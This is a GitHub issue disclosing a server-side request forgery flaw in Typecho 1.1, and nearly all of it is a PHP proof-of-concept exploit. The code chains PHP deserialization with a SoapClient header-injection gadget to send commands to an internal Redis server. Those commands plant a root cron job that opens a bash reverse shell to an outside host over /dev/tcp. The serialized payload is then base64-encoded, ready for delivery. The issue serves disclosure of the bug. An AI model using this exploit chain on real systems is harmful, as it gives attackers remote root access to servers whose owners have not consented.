Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Typecho(1.1) has Server-Side Request Forgery(SSRF) #157

Open
de1ayg opened this issue Oct 27, 2018 · 0 comments
Open

Typecho(1.1) has Server-Side Request Forgery(SSRF) #157

de1ayg opened this issue Oct 27, 2018 · 0 comments

Comments

@de1ayg
Copy link

de1ayg commented Oct 27, 2018

Typecho(1.1) SSRF:

Need SOAPClient of PHP,and unserialization it.

POC:

<?php
	
	class Typecho_Db_Query{
	  
	    private static $_default = array(
	        'action' => 'SELECT',
	    );
	
	    private $_adapter;
	    private $_sqlPreBuild;
	    private $_prefix;
	
	    public function __construct($adapter, $prefix){
	        $this->_adapter = &$adapter;
	        $this->_prefix = $prefix;
	
	        $this->_sqlPreBuild = self::$_default;
	    }
	}
	
	$target = "http://XXX.XXX.182.9:6379";
	
	$post_string = 'set xx "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/XXX.XXX.180.248/7777 0>&1\n\n" ^^ config set dir /var/spool/cron/ ^^ config set dbfilename root ^^ save';
	
	$headers = array(
	
	);
	
	$a = new SoapClient(null,array('location' => $target,'user_agent'=>'wupco^^Content-Type: application/x-www-form-urlencoded^^'.join('^^',$headers).'^^Content-Length: '. (string)strlen($post_string).'^^^^'.$post_string,'uri'=>'hello'));
	
	$b = serialize($a);
	$b = str_replace('^^',"\n\r",$b);
	$c = unserialize($b);
	
	$query = new Typecho_Db_Query($c,'B');
	
	$exp = array(
	        'adapter' => $query,
	        'prefix'  => 'typecho_'
	);
	
	echo base64_encode(serialize($exp));
	
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant